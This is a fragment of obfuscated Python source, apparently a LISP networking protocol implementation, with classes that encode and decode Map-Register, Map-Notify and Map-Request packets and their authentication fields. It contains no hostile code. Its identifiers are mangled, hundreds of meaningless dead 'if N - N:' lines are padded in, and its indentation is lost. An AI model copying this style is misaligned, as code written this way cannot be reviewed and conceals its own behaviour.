if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
if 61 - 61: Oo0Ooo - I1Ii111
if 51 - 51: iII111i * ooOoO0o / O0 / O0
if 52 - 52: OoooooooOO % O0
if 56 - 56: oO0o - i1IIi * OoooooooOO - II111iiii
if 28 - 28: i1IIi / I11i . o0oOOo0O0Ooo
if 11 - 11: Oo0Ooo * OoooooooOO - i11iIiiIii
if 13 - 13: i11iIiiIii . O0 / OOooOOo * i1IIi
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if 10 - 10: II111iiii . OOooOOo / iII111i
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
if 3 - 3: I1ii11iIi11i
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if 17 - 17: IiII
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
if 54 - 54: ooOoO0o * I11i - I1Ii111
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
class lisp_map_register ( ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 19 - 19: o0oOOo0O0Ooo . II111iiii / i1IIi
if 82 - 82: O0 / iII111i * OoO0O00 - I11i + Oo0Ooo
def print_map_register ( self ) :
IIiiII11i11I = lisp_hex_string ( self . xtr_id )
if 95 - 95: Oo0Ooo / IiII + Oo0Ooo
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 94 - 94: ooOoO0o - i1IIi . O0 / I1IiiI
lprint ( oOOo0ooO0 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# I1Ii111 - I1Ii111 - I1Ii111
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , IIiiII11i11I , self . site_id ) )
if 92 - 92: I1IiiI . Ii1I
if 60 - 60: I1ii11iIi11i * Oo0Ooo
if 85 - 85: i1IIi * OoOoOO00
if 99 - 99: Oo0Ooo
def encode ( self ) :
i1OOoO0OO0oO = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : i1OOoO0OO0oO |= 0x08000000
if ( self . lisp_sec_present ) : i1OOoO0OO0oO |= 0x04000000
if ( self . xtr_id_present ) : i1OOoO0OO0oO |= 0x02000000
if ( self . map_register_refresh ) : i1OOoO0OO0oO |= 0x1000
if ( self . use_ttl_for_timeout ) : i1OOoO0OO0oO |= 0x800
if ( self . merge_register_requested ) : i1OOoO0OO0oO |= 0x400
if ( self . mobile_node ) : i1OOoO0OO0oO |= 0x200
if ( self . map_notify_requested ) : i1OOoO0OO0oO |= 0x100
if ( self . encryption_key_id != None ) :
i1OOoO0OO0oO |= 0x2000
i1OOoO0OO0oO |= self . encryption_key_id << 14
if 72 - 72: Oo0Ooo / II111iiii * ooOoO0o * I1ii11iIi11i - IiII / I1Ii111
if 82 - 82: I1IiiI / I11i
if 6 - 6: Ii1I / ooOoO0o / i11iIiiIii % o0oOOo0O0Ooo
if 69 - 69: I1Ii111
if 83 - 83: iIii1I11I1II1 . o0oOOo0O0Ooo + I1Ii111 . OoooooooOO / ooOoO0o + II111iiii
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 90 - 90: Ii1I * iII111i / OOooOOo
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 68 - 68: OoOoOO00
if 65 - 65: oO0o
if 82 - 82: o0oOOo0O0Ooo
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 80 - 80: i1IIi % OoOoOO00 + OoO0O00 - OoooooooOO / iIii1I11I1II1 + I1Ii111
IiiiIi1iiii11 = self . zero_auth ( IiiiIi1iiii11 )
return ( IiiiIi1iiii11 )
if 65 - 65: Ii1I
if 71 - 71: I1Ii111 % I1Ii111 . oO0o + i11iIiiIii - i11iIiiIii
def zero_auth ( self , packet ) :
oO0ooOoO = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
Iiii = ""
Ooo = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
Iiii = struct . pack ( "QQI" , 0 , 0 , 0 )
Ooo = struct . calcsize ( "QQI" )
if 97 - 97: I1Ii111 . o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
Iiii = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
Ooo = struct . calcsize ( "QQQQ" )
if 20 - 20: OoooooooOO + OoooooooOO % oO0o % OoooooooOO
packet = packet [ 0 : oO0ooOoO ] + Iiii + packet [ oO0ooOoO + Ooo : : ]
return ( packet )
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
def encode_auth ( self , packet ) :
oO0ooOoO = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
Ooo = self . auth_len
Iiii = self . auth_data
packet = packet [ 0 : oO0ooOoO ] + Iiii + packet [ oO0ooOoO + Ooo : : ]
return ( packet )
if 37 - 37: IiII % Ii1I % i1IIi
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
def decode ( self , packet ) :
oO0ooOoOooO00o00 = packet
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if 64 - 64: IiII . OOooOOo
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO [ 0 ] )
packet = packet [ IiIii1i : : ]
if 85 - 85: II111iiii % Ii1I * OoOoOO00
O0O00Oo = "QBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if 33 - 33: i1IIi . i1IIi * OoooooooOO % I1Ii111 * o0oOOo0O0Ooo
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 64 - 64: ooOoO0o / ooOoO0o + I1ii11iIi11i * OOooOOo % OOooOOo
if 87 - 87: OoO0O00 * Oo0Ooo
self . nonce = byte_swap_64 ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( i1OOoO0OO0oO & 0x08000000 ) else False
if 83 - 83: i1IIi * I1Ii111 - IiII / Ii1I
self . lisp_sec_present = True if ( i1OOoO0OO0oO & 0x04000000 ) else False
self . xtr_id_present = True if ( i1OOoO0OO0oO & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( i1OOoO0OO0oO & 0x800 ) else False
self . map_register_refresh = True if ( i1OOoO0OO0oO & 0x1000 ) else False
self . merge_register_requested = True if ( i1OOoO0OO0oO & 0x400 ) else False
self . mobile_node = True if ( i1OOoO0OO0oO & 0x200 ) else False
self . map_notify_requested = True if ( i1OOoO0OO0oO & 0x100 ) else False
self . record_count = i1OOoO0OO0oO & 0xff
if 48 - 48: oO0o . II111iiii - OoOoOO00 % i1IIi . OoOoOO00
if 32 - 32: Ii1I * I1IiiI - OOooOOo . Oo0Ooo / O0 + Ii1I
if 67 - 67: OoOoOO00 % Oo0Ooo
if 7 - 7: i11iIiiIii % I1ii11iIi11i / I1Ii111 % Oo0Ooo - OoO0O00
self . encrypt_bit = True if i1OOoO0OO0oO & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( i1OOoO0OO0oO >> 14 ) & 0x7
if 73 - 73: I1ii11iIi11i
if 92 - 92: i11iIiiIii + O0 * I11i
if 60 - 60: o0oOOo0O0Ooo / Oo0Ooo
if 19 - 19: iIii1I11I1II1 . OoO0O00 / OoooooooOO
if 2 - 2: O0 - O0 % I1Ii111 / I1ii11iIi11i
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( oO0ooOoOooO00o00 ) == False ) : return ( [ None , None ] )
if 76 - 76: OoO0O00 * oO0o - OoO0O00
if 57 - 57: OoooooooOO / OoOoOO00 + oO0o . Ii1I
packet = packet [ IiIii1i : : ]
if 14 - 14: i11iIiiIii % OOooOOo * o0oOOo0O0Ooo * OoOoOO00
if 55 - 55: I1Ii111 * OOooOOo * I1Ii111
if 70 - 70: O0 . Ii1I
if 33 - 33: OOooOOo * Ii1I
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 64 - 64: i11iIiiIii . iIii1I11I1II1
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 7 - 7: OoOoOO00 % ooOoO0o + OoOoOO00 - OoOoOO00 * i11iIiiIii % OoO0O00
if 57 - 57: OOooOOo / OoO0O00 + I1ii11iIi11i
Ooo = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
IiIii1i = struct . calcsize ( "QQI" )
if ( Ooo < IiIii1i ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 60 - 60: O0 * Oo0Ooo % OOooOOo + IiII . OoO0O00 . Oo0Ooo
o0O0OoOOo0o , I1iIiiIii , O0OOOOO0O = struct . unpack ( "QQI" , packet [ : Ooo ] )
ii111 = ""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
IiIii1i = struct . calcsize ( "QQQQ" )
if ( Ooo < IiIii1i ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 31 - 31: IiII . oO0o
o0O0OoOOo0o , I1iIiiIii , O0OOOOO0O , ii111 = struct . unpack ( "QQQQ" ,
packet [ : Ooo ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 40 - 40: Ii1I - I11i / II111iiii * i1IIi + IiII * II111iiii
return ( [ None , None ] )
if 53 - 53: I1ii11iIi11i - i11iIiiIii . OoO0O00 / OoOoOO00 - I1Ii111
self . auth_data = lisp_concat_auth_data ( self . alg_id , o0O0OoOOo0o , I1iIiiIii ,
O0OOOOO0O , ii111 )
oO0ooOoOooO00o00 = self . zero_auth ( oO0ooOoOooO00o00 )
packet = packet [ self . auth_len : : ]
if 99 - 99: Ii1I - IiII - i1IIi / i11iIiiIii . IiII
return ( [ oO0ooOoOooO00o00 , packet ] )
if 58 - 58: OOooOOo
if 12 - 12: I1IiiI . o0oOOo0O0Ooo * OoooooooOO
def encode_xtr_id ( self , packet ) :
OOO0oo = self . xtr_id >> 64
ii1iII1 = self . xtr_id & 0xffffffffffffffff
OOO0oo = byte_swap_64 ( OOO0oo )
ii1iII1 = byte_swap_64 ( ii1iII1 )
Iii1I1 = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , OOO0oo , ii1iII1 , Iii1I1 )
return ( packet )
if 87 - 87: OoooooooOO - oO0o - ooOoO0o * I1ii11iIi11i
if 44 - 44: oO0o * II111iiii * II111iiii + I1IiiI / Oo0Ooo
def decode_xtr_id ( self , packet ) :
IiIii1i = struct . calcsize ( "QQQ" )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - IiIii1i : : ]
OOO0oo , ii1iII1 , Iii1I1 = struct . unpack ( "QQQ" ,
packet [ : IiIii1i ] )
OOO0oo = byte_swap_64 ( OOO0oo )
ii1iII1 = byte_swap_64 ( ii1iII1 )
self . xtr_id = ( OOO0oo << 64 ) | ii1iII1
self . site_id = byte_swap_64 ( Iii1I1 )
return ( True )
if 9 - 9: Oo0Ooo - IiII
if 30 - 30: OoooooooOO % OOooOOo
if 14 - 14: OoOoOO00 / OoO0O00 / i11iIiiIii - OoOoOO00 / o0oOOo0O0Ooo - OOooOOo
if 81 - 81: iII111i % Ii1I . ooOoO0o
if 66 - 66: I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if 20 - 20: ooOoO0o
if 63 - 63: iIii1I11I1II1 . OoO0O00
if 100 - 100: i1IIi * i1IIi
if 26 - 26: OOooOOo . OoO0O00 % OoOoOO00
if 94 - 94: IiII
if 15 - 15: Ii1I - IiII / O0
if 28 - 28: I1Ii111 . i1IIi / I1ii11iIi11i
if 77 - 77: i11iIiiIii / I1Ii111 / i11iIiiIii % OoOoOO00 - I1Ii111
if 80 - 80: I1Ii111 % OoOoOO00 . OoooooooOO . II111iiii % IiII
if 6 - 6: I1Ii111 % IiII / Ii1I + I1Ii111 . oO0o
if 70 - 70: iIii1I11I1II1 / Ii1I
if 61 - 61: O0 * o0oOOo0O0Ooo + I1Ii111 - OOooOOo . I1IiiI - IiII
if 7 - 7: I1ii11iIi11i
if 81 - 81: Oo0Ooo % II111iiii % o0oOOo0O0Ooo / I11i
if 95 - 95: OoOoOO00 - O0 % OoooooooOO
if 13 - 13: i11iIiiIii
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
if 87 - 87: Ii1I % I1ii11iIi11i * Oo0Ooo
if 59 - 59: Oo0Ooo / I11i - iIii1I11I1II1 * iIii1I11I1II1
if 18 - 18: I11i * I1ii11iIi11i / i11iIiiIii / iIii1I11I1II1 * OoooooooOO . OOooOOo
if 69 - 69: Oo0Ooo * ooOoO0o
if 91 - 91: o0oOOo0O0Ooo . ooOoO0o / OoO0O00 / i11iIiiIii * o0oOOo0O0Ooo
if 52 - 52: I1IiiI - i11iIiiIii / IiII . oO0o
if 38 - 38: oO0o + OoooooooOO * OoOoOO00 % oO0o
if 91 - 91: i1IIi - I1ii11iIi11i * I1IiiI
if 24 - 24: OoOoOO00 * Ii1I
class lisp_map_notify ( ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 17 - 17: OoO0O00 . I1IiiI * O0
if 81 - 81: OOooOOo
def print_notify ( self ) :
Iiii = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( Iiii ) != 40 ) :
Iiii = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( Iiii ) != 64 ) :
Iiii = self . auth_data
if 58 - 58: II111iiii . I1Ii111 . Ii1I * OoooooooOO / Ii1I / I11i
oOOo0ooO0 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( oOOo0ooO0 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# OoOoOO00 + OoooooooOO % OoO0O00
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , Iiii ) )
if 83 - 83: ooOoO0o - Oo0Ooo . II111iiii + oO0o - I1ii11iIi11i
if 10 - 10: OOooOOo . Ii1I
if 5 - 5: IiII - I11i
if 16 - 16: IiII . iII111i . Oo0Ooo % OOooOOo / IiII
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
Iiii = struct . pack ( "QQI" , 0 , 0 , 0 )
if 72 - 72: o0oOOo0O0Ooo * ooOoO0o - i11iIiiIii / Ii1I
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
Iiii = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 11 - 11: O0 - I1IiiI
packet += Iiii
return ( packet )
if 31 - 31: iII111i
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
i1OOoO0OO0oO = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
i1OOoO0OO0oO = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 30 - 30: I11i - OoO0O00
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = IiiiIi1iiii11 + eid_records
return ( self . packet )
if 15 - 15: OoooooooOO
if 31 - 31: II111iiii
if 62 - 62: iIii1I11I1II1 % I1Ii111 % I1ii11iIi11i * IiII
if 87 - 87: IiII
if 45 - 45: oO0o + II111iiii * O0 % OOooOOo . iIii1I11I1II1
IiiiIi1iiii11 = self . zero_auth ( IiiiIi1iiii11 )
IiiiIi1iiii11 += eid_records
if 55 - 55: IiII
I1iI1111ii1I1 = lisp_hash_me ( IiiiIi1iiii11 , self . alg_id , password , False )
if 43 - 43: OOooOOo
oO0ooOoO = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
Ooo = self . auth_len
self . auth_data = I1iI1111ii1I1
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : oO0ooOoO ] + I1iI1111ii1I1 + IiiiIi1iiii11 [ oO0ooOoO + Ooo : : ]
self . packet = IiiiIi1iiii11
return ( IiiiIi1iiii11 )
if 17 - 17: i11iIiiIii
if 94 - 94: OoooooooOO - IiII + oO0o . OoooooooOO / i1IIi
def decode ( self , packet ) :
oO0ooOoOooO00o00 = packet
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 53 - 53: I1Ii111 % I1ii11iIi11i
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO [ 0 ] )
self . map_notify_ack = ( ( i1OOoO0OO0oO >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = i1OOoO0OO0oO & 0xff
packet = packet [ IiIii1i : : ]
if 17 - 17: OoooooooOO % Ii1I % O0
O0O00Oo = "QBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 46 - 46: iII111i + I1Ii111 % OoooooooOO * I1ii11iIi11i
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 89 - 89: IiII - IiII % iII111i / I11i + oO0o - IiII
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ IiIii1i : : ]
self . eid_records = packet [ self . auth_len : : ]
if 97 - 97: Ii1I % OoOoOO00 / I1ii11iIi11i / iIii1I11I1II1 * OoooooooOO * OOooOOo
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 80 - 80: oO0o / O0
if 55 - 55: I1IiiI * I11i / O0 % OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if ( len ( packet ) < self . auth_len ) : return ( None )
if 54 - 54: OOooOOo
Ooo = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
o0O0OoOOo0o , I1iIiiIii , O0OOOOO0O = struct . unpack ( "QQI" , packet [ : Ooo ] )
ii111 = ""
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
o0O0OoOOo0o , I1iIiiIii , O0OOOOO0O , ii111 = struct . unpack ( "QQQQ" ,
packet [ : Ooo ] )
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
self . auth_data = lisp_concat_auth_data ( self . alg_id , o0O0OoOOo0o , I1iIiiIii ,
O0OOOOO0O , ii111 )
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
IiIii1i = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( oO0ooOoOooO00o00 [ : IiIii1i ] )
IiIii1i += Ooo
packet += oO0ooOoOooO00o00 [ IiIii1i : : ]
return ( packet )
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
if 80 - 80: oO0o
if 81 - 81: OoooooooOO / ooOoO0o * iIii1I11I1II1 . Oo0Ooo + oO0o / O0
if 84 - 84: II111iiii - o0oOOo0O0Ooo
if 78 - 78: IiII
if 58 - 58: i11iIiiIii - OoOoOO00
if 67 - 67: I1ii11iIi11i / iII111i + iIii1I11I1II1 % I1IiiI
if 99 - 99: ooOoO0o . Ii1I
if 92 - 92: i1IIi
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
if 4 - 4: Ii1I
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
if 83 - 83: I11i . OOooOOo + I1Ii111 * I11i . I1Ii111 + oO0o
if 64 - 64: Ii1I . o0oOOo0O0Ooo - i1IIi
if 35 - 35: I1ii11iIi11i % OoooooooOO
if 59 - 59: I1IiiI % I11i
if 32 - 32: I1IiiI * O0 + O0
if 34 - 34: IiII
if 5 - 5: OoO0O00 . I1IiiI
if 48 - 48: Oo0Ooo - OoO0O00 . I11i - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i / OoooooooOO - II111iiii
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
if 9 - 9: i1IIi % I1Ii111 - OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
if 31 - 31: I1Ii111 - I11i
if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
if 30 - 30: OOooOOo * I1ii11iIi11i % I1ii11iIi11i + iII111i * IiII
if 33 - 33: o0oOOo0O0Ooo + I11i * O0 * OoO0O00 . I1ii11iIi11i
if 74 - 74: iII111i * iII111i * o0oOOo0O0Ooo / oO0o
if 91 - 91: i11iIiiIii . I1ii11iIi11i / II111iiii
if 97 - 97: Ii1I % i1IIi % IiII + Oo0Ooo - O0 - I11i
class lisp_map_request ( ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
